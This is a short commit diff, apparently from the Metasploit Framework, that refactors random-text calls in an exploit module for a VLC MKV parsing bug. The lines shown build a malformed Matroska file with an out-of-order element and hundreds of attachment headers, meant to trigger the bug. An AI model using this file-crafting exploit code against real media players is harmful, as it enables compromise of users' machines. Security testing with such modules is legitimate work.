exploit rand_text
exploit:vlc_mkv use rand_text functions defined in exploit.rbGSoC/Meterpreter_Web_Console
parent
e07da5c518
commit
94f260f289
|
@ -221,11 +221,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
void = "\xec" << data_size(2) << "\x41" # Trigger bug with an out-of-order element
|
||||
|
||||
# Info
|
||||
segment_uid = "\x73\xa4" << data_size(16) << Rex::Text.rand_text(16, payload_badchars)
|
||||
segment_uid = "\x73\xa4" << data_size(16) << rand_text(16)
|
||||
info = "\x15\x49\xa9\x66" << data_size(segment_uid.length) << segment_uid
|
||||
|
||||
# Chapters
|
||||
chapter_segment_uid = "\x6e\x67" << data_size(16) << Rex::Text.rand_text(16, payload_badchars)
|
||||
chapter_segment_uid = "\x6e\x67" << data_size(16) << rand_text(16)
|
||||
chapter_atom = "\xb6" << data_size(chapter_segment_uid.length) << chapter_segment_uid
|
||||
edition_entry = "\x45\xb9" << data_size(chapter_atom.length) << chapter_atom
|
||||
chapters = "\x10\x43\xa7\x70" << data_size(edition_entry.length) << edition_entry
|
||||
|
@ -244,8 +244,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
data = build_data(size)
|
||||
data = "\x46\x5c" << data_size(data.length) << data
|
||||
500.times do
|
||||
uid = "\x46\xae" << data_size(8) << Rex::Text.rand_text(8, payload_badchars)
|
||||
file_name = "\x46\x6e" << data_size(8) << Rex::Text.rand_text(8, payload_badchars)
|
||||
uid = "\x46\xae" << data_size(8) << rand_text(8)
|
||||
file_name = "\x46\x6e" << data_size(8) << rand_text(8)
|
||||
header = "\x61\xa7" << data_size(uid.length + file_name.length + mime.length + data.length)
|
||||
|
||||
attached_files << header << file_name << mime << uid << data
|
||||
|
|
Loading…
Reference in New Issue